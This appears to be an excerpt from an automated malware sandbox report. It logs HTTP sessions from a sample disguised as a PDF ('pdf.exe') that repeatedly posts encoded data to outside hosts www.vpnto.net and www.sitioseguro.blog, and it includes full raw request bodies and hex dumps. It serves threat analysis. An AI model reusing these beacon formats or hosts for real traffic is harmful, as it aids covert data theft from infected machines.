                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.45001891.226.30.3804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:06.409358025 CET10817OUTPOST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 6d 6e 46 31 6a 58 35 6f 35 4c 56 47 51 4d 30 75 71 56 5a 70 4e 59 4d 33 73 76 53 2b 38 35 6a 66 52 7a 39 37 6d 63 49 70 61 49 79 76 58 6d 7a 2b 46 58 37 68 43 6f 31 72 64 41 47 64 31 6b 46 64 4e 62 64 69 37 73 44 58 49 32 44 36 2f 76 68 67 6b 42 34 6f 2b 47 65 71 6c 46 51 53 70 45 4c 79 6b 69 31 34 69 75 30 30 30 77 69 51 67 43 72 77 49 67 6f 53 34 52 77 2f 5a 51 35 75 49 51 68 54 2f 55 57 7a 56 44 56 62 72 70 6a 4a 66 7a 68 58 2f 6a 48 57 36 74 65 6f 38 66 33 6e 43 72 78 68 77 38 6a 65 36 34 48 41 32 79 53 2b 65 58 32 48 6f 7a 35 79 7a 50 69 76 61 6d 6e 34 56 77 35 6f 43 51 2f 4a 38 49 47 54 47 52 42 77 53 2f 33 4d 45 63 7a 36 47 6f 5a 34 59 2f 65 7a 71 32 39 38 44 37 45 5a 61 6f 52 70 55 76 50 54 41 6b 52 70 30 59 31 61 52 56 6b 4f 54 4a 38 45 4f 78 30 6a 6a 52 59 70 47 76 32 44 55 6c 66 72 31 6f 54 4e 4d 44 43 38 5a 4a 51 46 2b 53 6a 47 69 65 34 72 59 72 64 41 53 78 33 6b 63 6e 77 69 59 53 4e 52 62 62 67 59 70 45 45 2f 56 32 68 57 2b 53 46 6e 46 33 67 46 59 66 47 79 49 [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=mnF1jX5o5LVGQM0uqVZpNYM3svS+85jfRz97mcIpaIyvXmz+FX7hCo1rdAGd1kFdNbdi7sDXI2D6/vhgkB4o+GeqlFQSpELyki14iu000wiQgCrwIgoS4Rw/ZQ5uIQhT/UWzVDVbrpjJfzhX/jHW6teo8f3nCrxhw8je64HA2yS+eX2Hoz5yzPivamn4Vw5oCQ/J8IGTGRBwS/3MEcz6GoZ4Y/ezq298D7EZaoRpUvPTAkRp0Y1aRVkOTJ8EOx0jjRYpGv2DUlfr1oTNMDC8ZJQF+SjGie4rYrdASx3kcnwiYSNRbbgYpEE/V2hW+SFnF3gFYfGyIL1fmZlkYJlbgSur1OCq4L/RvRnZCFsCHjshgaM6/OpIjHcFiFqzHyrq0NwMMuOfqjpNOquJulLNjCot+S/dF3MEX78tOgbxOiua9awkkmWQj4MWoUJrWFSZR9EUB4/gSDH5SwsleMyoPIwJjqp9WxQYuZlU+xE3skVdk9PCkvXilt3kv3mqcV37uWq0RE010vaQjgzGdmODUvS/M3Fo6cZJXTlFZXzUlFDj9BJu0Rmn4RBzycHnkdK44XefRTMGGYKSHtnmFE2DKu7OFUgQagd3CDCPb7SEkwJRQChHFL1/l+2qYt4przHQBx/HTb7oO6rspyUyUuxMb8NoV3OIzilVNDdq3gjhXOeJQN7WmOI9o6MmK09CrQdXqSicyo7j7T6vmrnNQbOLDP3Jl/S7NP4E9Zmxblnf4Bwcq/C14YBgOpwLGkRwuphhExitdQj0lSbLepL9qiXMXZgTnHrXBjNZaU/o9IC9rBYTb+HYU7ME2i9u+p7GZ53SKDU4O/ddyErux2SMTqcQmg9CwWHt3W4QmnVz3f7syvMIUystn6J1E6GUvvC6DCSeJ9zvkZKqkHgw6mGEAlD7mrf46vTO2/TGIpg+TxyK1li+XT7N6h5B8gQFRQRTLKhN1zilKB26tySyQlySx8r7+fzAV/7/43D88/f/fpk6LJE [TRUNCATED]
                                                  Nov 19, 2024 03:57:07.534674883 CET1236INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 19 Nov 2024 02:57:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip
                                                  Data Raw: 63 33 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c5 59 5b 6f db 46 16 7e b6 7f c5 84 01 22 19 6b 91 96 93 26 b1 2c a9 d8 5c 80 64 e1 5c d0 b8 9b 2d 82 20 a0 c8 91 c4 58 22 15 92 b2 ec a6 01 72 d9 34 2d 1c 24 bb 45 81 f6 61 b1 4d 8b 7d 58 60 b1 80 ed c4 b5 6a c7 0e d0 5f 40 fe a3 fd ce cc 90 a2 2c d9 2e f6 61 37 6d 14 8a 33 73 e6 cc b9 7c e7 3b a3 f2 89 4b 37 2e 2e 7e 76 f3 32 6b 86 ed 16 bb f9 e9 85 85 ab 17 99 56 30 8c db a7 2f 1a c6 a5 c5 4b ec 4f 57 16 af 2d b0 a2 3e c3 6e 85 be 63 85 86 71 f9 ba c6 b4 66 18 76 4a 86 d1 eb f5 f4 de 69 dd f3 1b c6 e2 27 c6 0a 49 29 d2 32 f5 58 08 c4 1a dd 0e 6d ad 3a 59 16 9b ac b4 5b 6e 50 19 23 a0 38 37 37 27 d7 69 0c 93 4a 2d d3 6d 54 34 ee 6a 2c 7d 22 19 dc b4 ab 93 93 13 e5 36 0f 4d e6 9a 6d 5e d1 96 f8 6a cf f3 ed 40 63 96 e7 86 dc 0d 2b 5a f4 2e da 8f de 47 5b d1 de 34 8b 1f e3 df b7 51 3f 7e 12 3f c5 f3 7a fc 34 da 8f 1f 4f b3 c1 9c 68 2f 5e 8b b6 58 d4 97 4b a2 f5 31 8b be 84 80 d7 d9 35 fb d1 e6 34 b3 bd b6 e9 b8 d3 cc b1 f1 d1 6b 7a 4e 80 83 2a e5 52 65 42 [TRUNCATED]
                                                  Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                  Nov 19, 2024 03:57:07.534811020 CET212INData Raw: d5 21 55 50 1c 96 13 d8 d1 aa 29 02 49 21 cd a2 94 32 81 b3 29 7b b7 4d bf e1 b8 a5 99 79 d6 41 cc 38 6e a3 34 a3 55 a3 1f a3 f5 e8 97 f8 29 8b 36 59 f4 01 d8 bd 1f 7f 19 6d 01 c7 9f 00 ad 09 ca a3 6d f1 b9 81 81 a7 d1 4e d4 17 fa 91 7a c2 25 93
                                                  Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.45001991.226.30.3804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:08.949137926 CET459OUTGET /s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.450020104.21.15.100804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:15.172544956 CET736OUTPOST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 54 76 73 53 4b 33 48 33 6f 33 4d 67 49 41 31 50 35 46 58 4f 34 79 43 4c 68 59 64 6c 77 77 77 54 71 76 43 7a 2f 2f 71 70 73 5a 2f 73 6f 5a 42 41 55 51 70 76 30 67 59 59 2b 59 52 58 46 2f 6c 47 30 52 2b 38 37 43 6d 5a 2f 74 6a 79 4c 38 77 71 39 64 57 6e 6a 2f 54 2b 4b 36 2b 75 63 43 7a 4e 50 2b 33 7a 34 33 4a 6c 31 4a 6d 78 30 4b 47 69 64 77 4b 53 4b 69 2b 58 51 47 71 6e 35 6f 4b 53 75 64 72 4e 6b 6e 4c 69 55 6b 41 2f 4b 65 4e 78 57 66 61 44 36 36 35 6b 58 52 52 6d 71 6d 34 52 6d 79 72 79 47 56 64 76 55 72 56 75 30 76 35 32 41 73 67 30 67 6b 56 36 37 59 37 73 57 56 4f 4b 6d 77 3d 3d
                                                  Data Ascii: 5lf8fv8H=TvsSK3H3o3MgIA1P5FXO4yCLhYdlwwwTqvCz//qpsZ/soZBAUQpv0gYY+YRXF/lG0R+87CmZ/tjyL8wq9dWnj/T+K6+ucCzNP+3z43Jl1Jmx0KGidwKSKi+XQGqn5oKSudrNknLiUkA/KeNxWfaD665kXRRmqm4RmyryGVdvUrVu0v52Asg0gkV67Y7sWVOKmw==
                                                  Nov 19, 2024 03:57:16.067656040 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:15 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eW2N2N0kEeseMyevRcKJ%2F18ECavgrhHOiagG1IYGcR5PXqexMI5QjcFDY0zwtZE1T%2F0vS7vGThnTrWaqO94BHfSVCY0qx4ReNOxQu1vOtyJ8yKNXpIsWK4AsPqJWpTiY2VbLi8Z%2FOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4cee89ed06090c-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                  Nov 19, 2024 03:57:16.067678928 CET90INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                                  Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.450021104.21.15.100804628C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:17.729649067 CET756OUTPOST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 54 76 73 53 4b 33 48 33 6f 33 4d 67 4a 68 46 50 2b 6d 50 4f 2b 53 43 45 74 34 64 6c 36 51 77 58 71 76 2b 7a 2f 2b 66 69 72 73 6e 73 70 34 78 41 56 55 39 76 33 67 59 59 74 59 52 53 47 50 6c 64 30 52 36 4f 37 44 71 5a 2f 74 48 79 4c 39 41 71 39 4d 57 6b 6a 76 54 38 65 4b 2b 73 53 69 7a 4e 50 2b 33 7a 34 33 63 4b 31 4e 43 78 30 36 32 69 64 55 65 64 4a 69 2b 49 52 47 71 6e 71 34 4b 57 75 64 71 6f 6b 6c 76 59 55 6d 34 2f 4b 66 39 78 57 74 79 45 6a 4b 35 59 61 78 51 69 37 45 4d 65 6e 44 6d 78 48 6b 4a 71 56 34 31 51 38 4a 30 73 52 64 42 6a 79 6b 78 4a 6d 66 79 59 62 57 7a 44 39 37 35 42 52 64 55 4a 73 59 6f 48 7a 39 47 36 72 79 78 57 71 7a 49 3d
                                                  Data Ascii: 5lf8fv8H=TvsSK3H3o3MgJhFP+mPO+SCEt4dl6QwXqv+z/+firsnsp4xAVU9v3gYYtYRSGPld0R6O7DqZ/tHyL9Aq9MWkjvT8eK+sSizNP+3z43cK1NCx062idUedJi+IRGqnq4KWudqoklvYUm4/Kf9xWtyEjK5YaxQi7EMenDmxHkJqV41Q8J0sRdBjykxJmfyYbWzD975BRdUJsYoHz9G6ryxWqzI=
                                                  Nov 19, 2024 03:57:18.626359940 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:18 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIwqUyEpxgRKe7HevT5kVNPZvOH0NBarFRHqvF1Z1ARnwXt9Y0mKr5LHjRMUgAy45x6QHCmfkf%2Bou66e6zGWENEfJO%2B3rmDnk0FvbmfJk8gEP50m6VBG%2FfFzCmI2BaSbFoj%2BvsTytg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4cee99eaa20fbb-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
                                                  Nov 19, 2024 03:57:18.626379013 CET92INData Raw: 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d
                                                  Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.450022104.21.15.10080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 03:57:20.672945023 CET10838OUTPOST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 54 76 73 53 4b 33 48 33 6f 33 4d 67 4a 68 46 50 2b 6d 50 4f 2b 53 43 45 74 34 64 6c 36 51 77 58 71 76 2b 7a 2f 2b 66 69 72 73 76 73 6f 4f 4e 41 56 32 56 76 32 67 59 59 75 59 52 54 47 50 6b 48 30 52 43 77 37 44 32 6e 2f 76 76 79 61 75 49 71 73 6f 69 6b 74 76 54 38 63 4b 2b 74 63 43 7a 59 50 2b 6d 62 34 33 4d 4b 31 4e 43 78 30 35 75 69 66 41 4b 64 50 69 2b 58 51 47 71 56 35 6f 4b 2b 75 5a 4f 53 6b 6c 37 49 49 47 59 2f 4a 38 46 78 47 4f 61 45 71 4b 35 67 64 78 51 45 37 45 52 65 6e 48 47 62 48 6b 39 41 56 2f 46 51 34 75 4d 36 47 39 52 64 76 43 5a 7a 34 38 4f 5a 61 45 6d 4f 77 61 46 56 56 75 4d 2b 32 4b 42 76 75 75 76 46 78 77 67 56 6f 7a 67 47 74 44 67 35 73 48 46 54 44 4d 6d 35 39 56 51 53 78 54 6e 56 47 38 51 75 79 75 46 78 61 65 33 6c 4d 30 63 39 58 32 73 65 65 4f 53 57 52 56 7a 35 68 56 63 61 50 75 77 71 76 75 55 71 61 6d 51 35 2f 6b 62 6d 51 59 6c 2b 66 42 6e 52 5a 42 46 69 76 79 66 39 57 35 6f 32 78 63 5a 2b 54 59 33 77 63 31 33 59 6a 51 4f 63 58 75 71 34 72 79 43 53 4e [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=TvsSK3H3o3MgJhFP+mPO+SCEt4dl6QwXqv+z/+firsvsoONAV2Vv2gYYuYRTGPkH0RCw7D2n/vvyauIqsoiktvT8cK+tcCzYP+mb43MK1NCx05uifAKdPi+XQGqV5oK+uZOSkl7IIGY/J8FxGOaEqK5gdxQE7ERenHGbHk9AV/FQ4uM6G9RdvCZz48OZaEmOwaFVVuM+2KBvuuvFxwgVozgGtDg5sHFTDMm59VQSxTnVG8QuyuFxae3lM0c9X2seeOSWRVz5hVcaPuwqvuUqamQ5/kbmQYl+fBnRZBFivyf9W5o2xcZ+TY3wc13YjQOcXuq4ryCSNP10mi+wmOcOg6mfLMRyb0nGzzyNfINqKahSnWj7vU6N1q+54zde8ATED4Jo4yXZIXXiX76+7Aw+Ozflnpl7dF7E+pTF6JblMO/INxtteW8v5EK+N/2yQ0gSIbPB4uVmme+97lgzvcvzlFwPsQIGv80K5a1iV3Ur1dOv6UoPMcJ8GNl8oanuJZka93DkjNTIZ7Pt/eaLBwmPNLUwMnwQmi12MNbV/Ry/x7TwrqY8QSIrb4aUBlgeR14e6VBXes1njWJDKROt3Z4qr2T/cHZiu8FIGml6SvweDs3ueKNzjCYz/oNC/ozSSZU5zgznDjN+60g2xFhSFvbuXpGAcQXwKcLZnuEd5rWa3veIPYTgdeJf+dL3F34mXyCqJ0WqcTdqRkbqIbIyoKpFrZbi3MbTBul/IC5BDraqb5NDouTKflDXq60PEof0Mpii2tvH0b3LDqFsvcAYRtYfkT4csZzae7/A5UGTq78TECNEcBTALM+snXtoCYJZJLC/XA5u16z3cNuLHskyH0J2PEaSG2bbcKHahIrVhHgguizE+nvDQi7yGDI+udWsLW3eE82uAh5Ui0EAEmoLK6cOEcCUYC6CPjwt7BtPGgq4qG7RBXmPKkikKwJ+UBTzHUfrDflca5j1Qzd4TnVV6pgb43QejsL67rVncty1WEV5P/R [TRUNCATED]
                                                  Nov 19, 2024 03:57:21.584063053 CET1236INHTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:21 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6Q5UKb0nOWUMNHYum7J2hT2HmXWLlDLK5BSLnLSV%2BBiTtpn0ghCds7jJmrOGkhX30cnMaAeE%2F3wmvQZefhy20lFn%2BfMfAkImV4549OOz2HDTtBCd1lAQuk48P72%2BNjrsjCZ5On8LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4ceeac4801cb92-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10838&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
                                                  Nov 19, 2024 03:57:21.584112883 CET95INData Raw: 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
                                                  Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:21:55:10
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0x340000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:true
